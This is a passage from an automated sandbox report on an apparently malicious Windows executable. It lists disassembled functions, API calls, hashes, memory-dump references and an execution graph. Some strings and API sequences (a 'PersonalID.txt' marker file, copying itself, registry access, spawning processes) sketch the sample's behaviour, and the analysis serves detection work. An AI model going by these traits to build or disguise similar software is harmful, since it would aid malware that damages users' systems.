                                                                                                                              • Part of subcall function 004711C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00471228
                                                                                                                              • Part of subcall function 004711C0: CloseHandle.KERNEL32(00000000), ref: 0047123D
                                                                                                                              • Part of subcall function 004711C0: MoveFileW.KERNEL32(?,?), ref: 00471277
                                                                                                                              • Part of subcall function 0047BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                              • Part of subcall function 0047BA10: RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                              • Part of subcall function 0047BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0047BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 0047B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047B4D7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            • Opcode ID: 389ef00e01722538b4d64c8b5896df82d9f899271ecc8d454bd3519306189b85
                                                                                                                            • Instruction ID: a133d328db52ea1cae40b3c62092b56500976433536ad120df0f18bf4e73d337
                                                                                                                            • Opcode Fuzzy Hash: 389ef00e01722538b4d64c8b5896df82d9f899271ecc8d454bd3519306189b85
                                                                                                                            • Instruction Fuzzy Hash: AB5166715142455BC724FF62C992AEEB7A8FF54348F40C82EF44E43162EF78A609CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0048AB93
                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 0048AC7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                            • String ID: 8W
                                                                                                                            • API String ID: 3761405300-2509821728
                                                                                                                            • Opcode ID: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction ID: 3132e605912e133f82f1ca4996622d756ba7569dcf55d633a52aded3e3d8f047
                                                                                                                            • Opcode Fuzzy Hash: 64ee1a73df179552024213226afbd529194318e49cc028ce25e78e5543d8b6fa
                                                                                                                            • Instruction Fuzzy Hash: AD21C4B5510304DBD7A0DF55F9956047BE8AB68350F10682AE90C8B6E0E2F169C8FF46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00473C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473CA0
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • _memset.LIBCMT ref: 00473C83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1327501947-3788999226
                                                                                                                            • Opcode ID: cd800497b728d5f9457137e52c5e2aa5ebd0d740b42a8c41208ae6fc204b041e
                                                                                                                            • Instruction ID: 18db1ced95fd6284bd47f09f23934aa2aa0b6eaefcaec78b6cf6294e361dcb85
                                                                                                                            • Opcode Fuzzy Hash: cd800497b728d5f9457137e52c5e2aa5ebd0d740b42a8c41208ae6fc204b041e
                                                                                                                            • Instruction Fuzzy Hash: 1B01D2F25003005BE330AF1AD801797B6E8AF50B25F10882EE99893781E7B9E944C799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            • Opcode ID: 4156211a67917c2de7320f5cf6972a1e45403c88da7e397430b2d95c6ced4196
                                                                                                                            • Instruction ID: c247d106844b85cc5bc76bc46d1f7014939a6aa7cfc9f9ce621274da3ce56af5
                                                                                                                            • Opcode Fuzzy Hash: 4156211a67917c2de7320f5cf6972a1e45403c88da7e397430b2d95c6ced4196
                                                                                                                            • Instruction Fuzzy Hash: A711D072940305ABDF20DF659C963AF76A0AF10718F00092BEC9952241F37A99288BCB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00480DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Assertion failed: %s, file %s, line %d, xrefs: 00480E13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt
                                                                                                                            • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                            • API String ID: 3494438863-969893948
                                                                                                                            • Opcode ID: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction ID: 56458dbef24f1e0e856a31aa98b2792af362259b99e0ebbf0fc7365f9e70331c
                                                                                                                            • Opcode Fuzzy Hash: 7e96d92ab9b0e5b8d8536881606d6573401ff37f1113f15ecbc2acd102612bd3
                                                                                                                            • Instruction Fuzzy Hash: 0FF0A47131A2118BF764BB76BC11A6E37D4B721724F100C2FF600EA680EB3C9849579A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004E0620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004E0686
                                                                                                                              • Part of subcall function 004B4C00: _raise.LIBCMT ref: 004B4C18
                                                                                                                            Strings
                                                                                                                            • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004E062E
                                                                                                                            • .\crypto\evp\digest.c, xrefs: 004E0638
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_raise
                                                                                                                            • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                            • API String ID: 1484197835-3867593797
                                                                                                                            • Opcode ID: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction ID: 06d27f4caf493e386d9ba8b0ad95f11089463cba8687677dd14eb3348537f226
                                                                                                                            • Opcode Fuzzy Hash: 7e1c663466d9bdaf2276e8cd8f13db5fa4a11c6109014f03b63f8c04876246d7
                                                                                                                            • Instruction Fuzzy Hash: 06018B35700200AFC310DF19EC42E5AB7E1AFC8705F19442EF588CB362D761EC958B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:7.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:15%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:192
                                                                                                                            execution_graph 38802 46a290 38807 47cc50 38802->38807 38816 483b4c 38807->38816 38809 47cc5d 38812 46a299 38809->38812 38826 4af1bb 59 API calls 3 library calls 38809->38826 38813 4819ac 38812->38813 38902 4818b0 38813->38902 38815 46a2a8 38819 483b54 38816->38819 38818 483b6e 38818->38809 38819->38818 38821 483b72 std::exception::exception 38819->38821 38827 480c62 38819->38827 38844 48793d DecodePointer 38819->38844 38845 490eca RaiseException 38821->38845 38823 483b9c 38846 490d91 58 API calls _free 38823->38846 38825 483bae 38825->38809 38828 480cdd 38827->38828 38838 480c6e 38827->38838 38856 48793d DecodePointer 38828->38856 38830 480ce3 38832 485208 _fputws 57 API calls 38830->38832 38831 480c79 38831->38838 38847 487f51 58 API calls 2 library calls 38831->38847 38848 487fae 58 API calls 8 library calls 38831->38848 38849 487b0b 38831->38849 38835 480cd5 38832->38835 38834 480ca1 RtlAllocateHeap 38834->38835 38834->38838 38835->38819 38837 480cc9 38853 485208 38837->38853 38838->38831 38838->38834 38838->38837 38842 480cc7 38838->38842 38852 48793d DecodePointer 38838->38852 38843 485208 _fputws 57 API calls 38842->38843 38843->38835 38844->38819 38845->38823 38846->38825 38847->38831 38848->38831 38857 487ad7 GetModuleHandleExW 38849->38857 38852->38838 38861 48501f GetLastError 38853->38861 38855 48520d 38855->38842 38856->38830 38858 487af0 GetProcAddress 38857->38858 38859 487b07 ExitProcess 38857->38859 38858->38859 38860 487b02 38858->38860 38860->38859 38875 492534 38861->38875 38863 485034 38864 485082 SetLastError 38863->38864 38878 488c96 38863->38878 38864->38855 38868 48505b 38869 485079 38868->38869 38870 485061 38868->38870 38886 480bed 38869->38886 38885 48508e 58 API calls 4 library calls 38870->38885 38873 485069 GetCurrentThreadId 38873->38864 38874 48507f 38874->38864 38876 49254b TlsGetValue 38875->38876 38877 492547 38875->38877 38876->38863 38877->38863 38881 488c9d 38878->38881 38880 485047 38880->38864 38884 492553 TlsSetValue 38880->38884 38881->38880 38883 488cbb 38881->38883 38892 49b813 38881->38892 38883->38880 38883->38881 38900 4929c9 Sleep 38883->38900 38884->38868 38885->38873 38887 480bf6 RtlFreeHeap 38886->38887 38891 480c1f _rand_s 38886->38891 38888 480c0b 38887->38888 38887->38891 38889 485208 _fputws 56 API calls 38888->38889 38890 480c11 GetLastError 38889->38890 38890->38891 38891->38874 38893 49b81e 38892->38893 38898 49b839 38892->38898 38894 49b82a 38893->38894 38893->38898 38895 485208 _fputws 57 API calls 38894->38895 38899 49b82f 38895->38899 38896 49b849 HeapAlloc 38896->38898 38896->38899 38898->38896 38898->38899 38901 48793d DecodePointer 38898->38901 38899->38881 38900->38883 38901->38898 38903 4818bc _fputws 38902->38903 38910 487dfc 38903->38910 38909 4818e3 _fputws 38909->38815 38927 488af7 38910->38927 38912 4818c5 38913 4818f4 DecodePointer DecodePointer 38912->38913 38914 481921 38913->38914 38915 4818d1 38913->38915 38914->38915 38970 48a78d 59 API calls _fputws 38914->38970 38924 4818ee 38915->38924 38917 481984 EncodePointer EncodePointer 38917->38915 38918 481933 38918->38917 38920 481958 38918->38920 38971 488d25 61 API calls 2 library calls 38918->38971 38920->38915 38922 481972 EncodePointer 38920->38922 38972 488d25 61 API calls 2 library calls 38920->38972 38922->38917 38923 48196c 38923->38915 38923->38922 38973 487e05 38924->38973 38928 488b08 38927->38928 38929 488b1b EnterCriticalSection 38927->38929 38934 488b9f 38928->38934 38929->38912 38931 488b0e 38931->38929 38958 487c2e 58 API calls 3 library calls 38931->38958 38935 488bab _fputws 38934->38935 38936 488bcc 38935->38936 38937 488bb4 38935->38937 38946 488bed _fputws 38936->38946 38961 488cde 38936->38961 38959 487f51 58 API calls 2 library calls 38937->38959 38939 488bb9 38960 487fae 58 API calls 8 library calls 38939->38960 38943 488bc0 38947 487b0b _doexit 3 API calls 38943->38947 38944 488be8 38948 485208 _fputws 58 API calls 38944->38948 38945 488bf7 38949 488af7 __lock 58 API calls 38945->38949 38946->38931 38951 488bca 38947->38951 38948->38946 38950 488bfe 38949->38950 38952 488c0b 38950->38952 38953 488c23 38950->38953 38951->38936 38967 49263e InitializeCriticalSectionAndSpinCount 38952->38967 38955 480bed _free 58 API calls 38953->38955 38956 488c17 38955->38956 38968 488c3f LeaveCriticalSection _doexit 38956->38968 38959->38939 38960->38943 38963 488cec 38961->38963 38962 480c62 _malloc 58 API calls 38962->38963 38963->38962 38964 488be1 38963->38964 38966 488cff 38963->38966 38964->38944 38964->38945 38966->38963 38966->38964 38969 4929c9 Sleep 38966->38969 38967->38956 38968->38946 38969->38966 38970->38918 38971->38920 38972->38923 38976 488c81 LeaveCriticalSection 38973->38976 38975 4818f3 38975->38909 38976->38975 38977 47bae0 38978 47bb13 38977->38978 38979 47bba0 38977->38979 38982 47bb15 38978->38982 38983 47bb54 38978->38983 38980 47bf3d 38979->38980 38981 47bbad 38979->38981 38990 47bf65 IsWindow 38980->38990 38991 47bf9a DefWindowProcW 38980->38991 38984 47bbd7 38981->38984 38985 47bbb0 DefWindowProcW 38981->38985 38986 47bb47 PostQuitMessage 38982->38986 38987 47bb1c 38982->38987 38988 47bb70 38983->38988 38992 47bb75 DefWindowProcW 38983->38992 38989 480c62 _malloc 58 API calls 38984->38989 38986->38988 38987->38985 38987->38988 38994 47bb2e 38987->38994 38993 47bbe9 GetComputerNameW 38989->38993 38990->38988 38995 47bf73 DestroyWindow 38990->38995 39053 473100 38993->39053 38994->38988 39016 471cd0 38994->39016 38995->38988 38997 47bc26 39060 47ce80 59 API calls _memmove 38997->39060 39000 47bb3f 39000->38990 39001 47bc3a 39002 480bed _free 58 API calls 39001->39002 39014 47bcdc 39002->39014 39003 47befb IsWindow 39004 47bf11 39003->39004 39005 47bf28 39003->39005 39004->39005 39006 47bf1a DestroyWindow 39004->39006 39005->38988 39006->39005 39007 47bef7 39007->39003 39007->39005 39008 474690 59 API calls 39008->39014 39014->39003 39014->39007 39014->39008 39015 47be8f CreateThread 39014->39015 39061 46eff0 65 API calls 39014->39061 39062 47c330 39014->39062 39068 47c240 39014->39068 39074 47b8b0 39014->39074 39096 47ce80 59 API calls _memmove 39014->39096 39015->39014 39097 48f7c0 39016->39097 39019 471d20 _memset 39020 471d40 RegQueryValueExW RegCloseKey 39019->39020 39021 471d8f 39020->39021 39099 475c10 39021->39099 39023 471dbf 39024 471dd1 lstrlenA 39023->39024 39025 471e7c 39023->39025 39114 473520 39024->39114 39027 471e94 6 API calls 39025->39027 39028 471e89 39025->39028 39029 471ef5 UuidCreate UuidToStringW 39027->39029 39028->39027 39031 471f36 39029->39031 39030 471e3c PathFileExistsW 39030->39025 39032 471e52 39030->39032 39031->39031 39034 475c10 59 API calls 39031->39034 39037 471e6a 39032->39037 39117 474690 39032->39117 39033 471df1 39033->39030 39035 471f59 RpcStringFreeW PathAppendW CreateDirectoryW 39034->39035 39038 471fce 39035->39038 39040 471f98 39035->39040 39037->39000 39039 475c10 59 API calls 39038->39039 39042 47201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39039->39042 39041 475c10 59 API calls 39040->39041 39041->39038 39043 4721d1 39042->39043 39044 47207c _memset 39042->39044 39043->39037 39045 472095 6 API calls 39044->39045 39046 472115 _memset 39045->39046 39047 472109 39045->39047 39049 472125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39046->39049 39140 473260 39047->39140 39050 4721b2 39049->39050 39051 4721aa GetLastError 39049->39051 39052 4721c0 WaitForSingleObject 39050->39052 39051->39043 39052->39043 39052->39052 39054 473133 39053->39054 39055 473121 39053->39055 39058 475c10 59 API calls 39054->39058 39056 475c10 59 API calls 39055->39056 39057 47312c 39056->39057 39057->38997 39059 473159 39058->39059 39059->38997 39060->39001 39061->39014 39167 47d3c0 39062->39167 39065 47c35b 39065->39014 39066 4af23e 59 API calls 39067 47c37a 39066->39067 39067->39014 39177 47d340 39068->39177 39071 47c26b 39071->39014 39072 4af23e 59 API calls 39073 47c28a 39072->39073 39073->39014 39075 47b8d6 39074->39075 39078 47b8e0 39074->39078 39076 474690 59 API calls 39075->39076 39076->39078 39077 47b916 39080 47b930 39077->39080 39081 474690 59 API calls 39077->39081 39078->39077 39079 474690 59 API calls 39078->39079 39079->39077 39082 47b94a 39080->39082 39083 474690 59 API calls 39080->39083 39081->39080 39084 47b964 39082->39084 39085 474690 59 API calls 39082->39085 39083->39082 39183 47bfd0 39084->39183 39085->39084 39087 47b976 39088 47bfd0 59 API calls 39087->39088 39089 47b988 39088->39089 39090 47bfd0 59 API calls 39089->39090 39091 47b99a 39090->39091 39092 47b9b4 39091->39092 39093 474690 59 API calls 39091->39093 39094 47b9f2 39092->39094 39195 473ff0 39092->39195 39093->39092 39094->39014 39096->39014 39098 471cf2 RegOpenKeyExW 39097->39098 39098->39019 39098->39037 39100 475c66 39099->39100 39101 475c1e 39099->39101 39102 475c76 39100->39102 39103 475cff 39100->39103 39101->39100 39110 475c45 39101->39110 39105 475c88 ___check_float_string 39102->39105 39147 476950 39102->39147 39156 4af23e 39103->39156 39105->39023 39112 474690 59 API calls 39110->39112 39113 475c60 39112->39113 39113->39023 39115 474690 59 API calls 39114->39115 39116 473550 39115->39116 39116->39033 39118 47478c 39117->39118 39119 4746a9 39117->39119 39165 4af26c 59 API calls 3 library calls 39118->39165 39121 4746b6 39119->39121 39122 4746e9 39119->39122 39123 474796 39121->39123 39124 4746c2 39121->39124 39125 4746f5 39122->39125 39126 4747a0 39122->39126 39166 4af26c 59 API calls 3 library calls 39123->39166 39164 473340 59 API calls _memmove 39124->39164 39130 476950 59 API calls 39125->39130 39138 474707 ___check_float_string 39125->39138 39128 4af23e 59 API calls 39126->39128 39129 4747aa 39128->39129 39131 4747bf 39129->39131 39132 4747cd 39129->39132 39130->39138 39134 475c10 59 API calls 39131->39134 39137 475c10 59 API calls 39132->39137 39136 4747c8 39134->39136 39135 4746e0 39135->39037 39136->39037 39139 4747ec 39137->39139 39138->39037 39139->39037 39141 47326f 39140->39141 39142 47327d 39140->39142 39143 475c10 59 API calls 39141->39143 39145 475c10 59 API calls 39142->39145 39144 473278 39143->39144 39144->39046 39146 47329c 39145->39146 39146->39046 39148 476986 39147->39148 39150 483b4c 59 API calls 39148->39150 39151 4769d3 39148->39151 39153 476a0d ___check_float_string 39148->39153 39150->39151 39151->39153 39161 4af1bb 59 API calls 3 library calls 39151->39161 39153->39105 39162 490cfc 58 API calls std::exception::_Copy_str 39156->39162 39158 4af256 39163 490eca RaiseException 39158->39163 39160 4af26b 39162->39158 39163->39160 39164->39135 39165->39123 39166->39126 39170 47ccc0 39167->39170 39171 483b4c 59 API calls 39170->39171 39172 47ccca 39171->39172 39174 47c347 39172->39174 39176 4af1bb 59 API calls 3 library calls 39172->39176 39174->39065 39174->39066 39178 47cc50 59 API calls 39177->39178 39179 47d36c 39178->39179 39180 47c257 39179->39180 39182 47d740 59 API calls 39179->39182 39180->39071 39180->39072 39182->39180 39184 47c001 39183->39184 39189 47c00a 39183->39189 39185 47c083 39184->39185 39186 47c04c 39184->39186 39184->39189 39188 47c09e 39185->39188 39192 47c0e1 39185->39192 39222 47cf30 39186->39222 39190 47cf30 59 API calls 39188->39190 39189->39087 39193 47c0b2 39190->39193 39230 47c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39192->39230 39193->39189 39226 47d5b0 39193->39226 39196 4740f2 39195->39196 39197 474009 39195->39197 39242 4af26c 59 API calls 3 library calls 39196->39242 39199 474016 39197->39199 39200 47405d 39197->39200 39203 4740fc 39199->39203 39204 474022 39199->39204 39201 474106 39200->39201 39202 474066 39200->39202 39208 4af23e 59 API calls 39201->39208 39218 474078 ___check_float_string 39202->39218 39233 476760 39202->39233 39243 4af26c 59 API calls 3 library calls 39203->39243 39206 474044 39204->39206 39207 47402b 39204->39207 39232 472e80 59 API calls _memmove 39206->39232 39231 472e80 59 API calls _memmove 39207->39231 39209 474110 39208->39209 39214 47412c 39209->39214 39215 47413a 39209->39215 39213 47403b 39213->39094 39244 4756d0 39214->39244 39220 4756d0 59 API calls 39215->39220 39216 474054 39216->39094 39218->39094 39219 474135 39219->39094 39221 474151 39220->39221 39221->39094 39223 47cf41 39222->39223 39224 47cf5b 39222->39224 39223->39224 39225 474690 59 API calls 39223->39225 39224->39189 39225->39223 39227 47d5e2 39226->39227 39228 47d63e 39227->39228 39229 474690 59 API calls 39227->39229 39228->39189 39229->39227 39230->39193 39231->39213 39232->39216 39235 476793 39233->39235 39234 4767dc 39239 476817 ___check_float_string 39234->39239 39263 4af1bb 59 API calls 3 library calls 39234->39263 39235->39234 39237 483b4c 59 API calls 39235->39237 39235->39239 39237->39234 39239->39218 39242->39203 39243->39201 39245 475735 39244->39245 39248 4756de 39244->39248 39246 4757bc 39245->39246 39247 47573e 39245->39247 39249 4af23e 59 API calls 39246->39249 39250 476760 59 API calls 39247->39250 39256 475750 ___check_float_string 39247->39256 39248->39245 39254 475704 39248->39254 39251 4757c6 39249->39251 39250->39256 39252 4757db 39251->39252 39264 4af26c 59 API calls 3 library calls 39251->39264 39252->39219 39257 47571f 39254->39257 39258 475709 39254->39258 39255 475806 39256->39219 39260 473ff0 59 API calls 39257->39260 39259 473ff0 59 API calls 39258->39259 39261 475719 39259->39261 39262 47572f 39260->39262 39261->39219 39262->39219 39264->39255 39265 4b4c30 39267 480c62 58 API calls 39265->39267 39266 4b4c3a 39267->39266 39268 483f84 39269 483f90 _fputws 39268->39269 39305 492603 GetStartupInfoW 39269->39305 39271 483f95 39307 4878d5 GetProcessHeap 39271->39307 39273 483fed 39274 483ff8 39273->39274 39636 48411a 58 API calls 3 library calls 39273->39636 39308 485141 39274->39308 39277 483ffe 39278 484009 __RTC_Initialize 39277->39278 39637 48411a 58 API calls 3 library calls 39277->39637 39329 488754 39278->39329 39281 484018 39282 484024 GetCommandLineW 39281->39282 39638 48411a 58 API calls 3 library calls 39281->39638 39348 49235f GetEnvironmentStringsW 39282->39348 39286 484023 39286->39282 39288 48403e 39289 484049 39288->39289 39639 487c2e 58 API calls 3 library calls 39288->39639 39358 4921a1 39289->39358 39293 48405a 39372 487c68 39293->39372 39296 484062 39297 48406d __wwincmdln 39296->39297 39641 487c2e 58 API calls 3 library calls 39296->39641 39378 479f90 39297->39378 39300 484081 39301 484090 39300->39301 39633 487f3d 39300->39633 39642 487c59 58 API calls _doexit 39301->39642 39304 484095 _fputws 39306 492619 39305->39306 39306->39271 39307->39273 39643 487d6c 36 API calls 2 library calls 39308->39643 39310 485146 39644 488c48 InitializeCriticalSectionAndSpinCount __mtinitlocknum 39310->39644 